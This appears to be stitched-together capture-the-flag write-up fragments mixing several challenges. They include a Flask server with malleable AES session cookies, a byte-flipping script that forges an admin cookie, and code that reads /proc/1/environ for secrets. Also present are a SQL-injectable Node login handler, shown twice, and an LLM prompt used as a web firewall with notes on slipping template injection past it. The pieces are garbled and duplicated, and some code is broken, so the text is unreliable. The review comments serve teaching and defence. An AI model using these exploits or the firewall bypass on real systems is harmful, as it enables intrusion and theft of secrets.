from flask import Flask, request, abort from Crypto.Cipher import AES from Crypto.Random import get_random_bytes from Crypto.Util.Padding import pad, unpad from flask import Flask, request, Response from base64 import b64encode, b64decode
@app.route("/")
def index():
    """Landing page: hand out the default session cookie on first visit.

    Returns:
        A Response carrying a freshly encrypted default session when no
        `session` cookie is present, otherwise a short plain-text greeting.
    """
    if request.cookies.get('session') is not None:
        return 'have a fun'
    greeting = Response("welcome to the FlipPIN server try request /hint to get the hint")
    # NOTE(review): the cookie is only encrypted; if encrypt() does not also
    # authenticate its output (its body is not shown here), a modified cookie
    # cannot be told apart from a genuine one on the way back in.  An AEAD
    # mode or a MAC over the ciphertext is the usual control.
    greeting.set_cookie('session', encrypt(default_session).decode())
    return greeting
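@app.route("/hint")
def hint():
    """Serve this module's own source as plain text (the challenge "hint").

    Returns:
        A text/plain Response whose body is the contents of __file__.
    """
    # Close the handle deterministically instead of leaving it to the GC.
    with open(__file__) as src:
        source = src.read()
    # NOTE(review): everything defined in this file is disclosed here, so any
    # secret kept in the module (keys, default session values) leaks with it;
    # load such values from the environment or a config file instead.
    return Response(source, mimetype='text/plain')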
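@app.route("/read")
def file():
    """Return the contents of a requested file to an administrator session.

    Without a `session` cookie the default one is issued.  Otherwise the
    cookie is decrypted and parsed as JSON; when its `admin` value is truthy
    the file named by the `filename` query parameter is read, subject to the
    module-level `filename_blacklist`.

    Returns:
        A str or Response body, or an aborted 400/403/404/500 response.
    """
    session = request.cookies.get('session')
    if session is None:
        res = Response("you are not logged in")
        # Consistent with index(): encrypt() yields bytes, set_cookie wants str.
        res.set_cookie('session', encrypt(default_session).decode())
        return res

    plain_session = decrypt(session)
    if plain_session is None:
        return 'don\'t hack me'

    # A cookie that decrypts but is not a JSON object is treated like a failed
    # decrypt instead of surfacing a traceback (which, with debug=True, would
    # render the interactive debugger page).
    try:
        session_data = json.loads(plain_session)
    except (ValueError, TypeError):
        return 'don\'t hack me'
    if not isinstance(session_data, dict) or not session_data.get('admin'):
        return 'You are not an administrator'

    filename = request.args.get('filename')
    if filename is None:
        # Previously a TypeError inside any() -> unhandled 500.
        abort(400, description='Missing filename parameter.')
    # NOTE(review): a substring denylist is a weak control for a path taken
    # from the request; resolving the path and checking that it stays under an
    # allowed base directory is the robust form of this check.
    if any(blacklist_str in filename for blacklist_str in filename_blacklist):
        abort(403, description='Access to this file is forbidden.')
    try:
        with open(filename, 'r') as f:
            return f.read()
    except FileNotFoundError:
        abort(404, description='File not found.')
    except Exception as e:
        # str(e) can echo the resolved path back to the client.
        abort(500, description=f'An error occurred: {str(e)}')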
if __name__ == "__main__":
    # NOTE(review): debug=True combined with a non-loopback bind exposes the
    # Werkzeug debugger and reloader to anyone who can reach the port; keep it
    # off outside local development.
    app.run(debug=True, port=9091, host="0.0.0.0")
# Writeup snippet: base64-decodes a captured session cookie, XORs the byte at
# index 10 with ord('1') ^ ord('0'), and re-encodes the result.  This is only
# meaningful because the server's cookie is encrypted without an integrity
# check, so the altered ciphertext is still accepted and decrypted; an
# authenticated construction (AES-GCM, or encrypt-then-MAC) rejects any
# modified cookie and removes this class of issue.
cipher = base64.b64decode('NGcMAGVYo/XqWTybD4TDonxbwAFSepn0xy0rzDrsIpylvnsjq5AobLr8uVhraQLNeTJMfe7usXGA6KDM+0uUIg=='.encode('utf-8'))
# ord(chr(b)) is an identity on a byte value; the expression flips one byte.
x = cipher[0:10]+bytes([ord(chr(cipher[10]))^ord('1')^ord('0')])+cipher[11:]
x = base64.b64encode(x).decode('utf-8')
print(x)
# Writeup snippet: copies PID 1's environment block (judging by the variable
# names, where the flag lives) into a file under destination_path.
# destination_path and destination_file_name are defined elsewhere.
# Defender note: any code running as the same user can read a process's
# environment through /proc/<pid>/environ, so a secret placed in the
# environment of a long-lived process turns a file-read or code-execution bug
# into a secret-disclosure bug.  Mount /proc with hidepid, keep secrets out of
# the environment (mounted secret files, short-lived credentials), or both.
with open("/proc/1/environ", 'r') as flag_file:
    flag_content = flag_file.read()
destination_file_path = os.path.join(destination_path, destination_file_name)
with open(destination_file_path, 'a') as destination_file:
    destination_file.write(flag_content)
// Fragment of the login route handler; the handler's opening lines are not
// shown here.  `user` and `pass` are spliced into the SQL text, so either
// value can change the statement itself.  The fix is a bound-parameter query:
// db.prepare("SELECT id FROM users WHERE username = ? AND password = ?").get(user, pass)
const query = `SELECT id FROM users WHERE username = '${user}' AND password = '${pass}';`;
try {
  const id = db.prepare(query).get()?.id;
  if (!id) {
    return res.redirect("/?message=Incorrect username or password");
  }
  // Admin status is keyed by the submitted username, not by the row found.
  if (users[id] && isAdmin[user]) {
    return res.redirect("/?flag=" + encodeURIComponent(FLAG));
  }
  return res.redirect("/?message=This system is currently only available to admins...");
} catch {
  // NOTE(review): swallowing every error hides malformed-query attempts and
  // genuine DB faults alike; log the error before redirecting.
  return res.redirect("/?message=Nice try...");
}
});
// Start the HTTP server and announce the bound port.
app.listen(PORT, function () {
  console.log(`web/funnylogin listening on port ${PORT}`);
});
让我们分解一下
1. 创建名为 users 的表，具有 id、用户名和密码属性
// Schema for the login table.  NOTE(review): the password column stores
// whatever the seeding code writes; if that is the raw password (the seeding
// is not shown here), it should be a salted slow hash (bcrypt/scrypt/argon2).
const createUsersTable = `CREATE TABLE users( id INTEGER PRIMARY KEY, username TEXT, password TEXT );`;
db.exec(createUsersTable);
// Fragment of the login route handler; the handler's opening lines are not
// shown here.  `user` and `pass` are spliced into the SQL text, so either
// value can change the statement itself.  The fix is a bound-parameter query:
// db.prepare("SELECT id FROM users WHERE username = ? AND password = ?").get(user, pass)
const query = `SELECT id FROM users WHERE username = '${user}' AND password = '${pass}';`;
try {
  const id = db.prepare(query).get()?.id;
  if (!id) {
    return res.redirect("/?message=Incorrect username or password");
  }
  // Admin status is keyed by the submitted username, not by the row found.
  if (users[id] && isAdmin[user]) {
    return res.redirect("/?flag=" + encodeURIComponent(FLAG));
  }
  return res.redirect("/?message=This system is currently only available to admins...");
} catch {
  // NOTE(review): swallowing every error hides malformed-query attempts and
  // genuine DB faults alike; log the error before redirecting.
  return res.redirect("/?message=Nice try...");
}
});
// System prompt for the model that acts as the "WAF".  NOTE(review): a
// language-model verdict is not a security boundary — it judges the wording
// of the submission, not what the submission does once rendered.  If the
// submission is evaluated as an EJS template (as the page text suggests), the
// control that holds is not rendering user input as a template at all.
const system =
  'You are a web application firewall. ' +
  'Your goal is to stop attempted hacking attempts. ' +
  'I will give you a submission and you will respond with H or R, only a single letter. ' +
  'H means hacking attempt, R means not a hacking attempt'
// Page template for the gpwaf app.  Both placeholders are EJS escaped-output
// tags (`<%= %>`), so `query` and `result` are HTML-escaped when this page is
// rendered.  NOTE(review): that escaping covers only this page; it does not
// apply to the user-submitted `template` value itself, which per the page
// text is rendered as an EJS template — that is where the injection risk is.
const html = `<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>gpwaf</title> <style> * { font-family: monospace; } #content { margin-left: auto; margin-right: auto; width: 100%; max-width: 830px; } button { font-size: 1.5em; } textarea { width: 100%; } </style> </head> <body> <div id="content"> <h1>gpwaf</h1> <p>i made a ejs renderer, its 100% hack proof im using gpt to check all your queries!</p> <form> <textarea name="template" placeholder="template" rows="30"><%= query %></textarea> <br> <button>run!</button> </form> <br> <pre><%= result %></pre> </div> </body> </html>`
SSTI 模板注入：这里的 <%= query %> 是我们的输入，<%= result %> 是输出，应该可以拿到 flag。
查看模型从应用程序获得的提示,我们可以看到它被指示返回H表示黑客尝试,或者在输入“安全”时返回R。
// System prompt for the model that acts as the "WAF".  NOTE(review): a
// language-model verdict is not a security boundary — it judges the wording
// of the submission, not what the submission does once rendered.  If the
// submission is evaluated as an EJS template (as the page text suggests), the
// control that holds is not rendering user input as a template at all.
const system =
  'You are a web application firewall. ' +
  'Your goal is to stop attempted hacking attempts. ' +
  'I will give you a submission and you will respond with H or R, only a single letter. ' +
  'H means hacking attempt, R means not a hacking attempt'
Description: For a better New Year, we are introducing a service that can help you reduce stress: <http://192.53.173.71:8080> . As our service is only available during the New Year, we are also providing you with a code for later use in the materials section.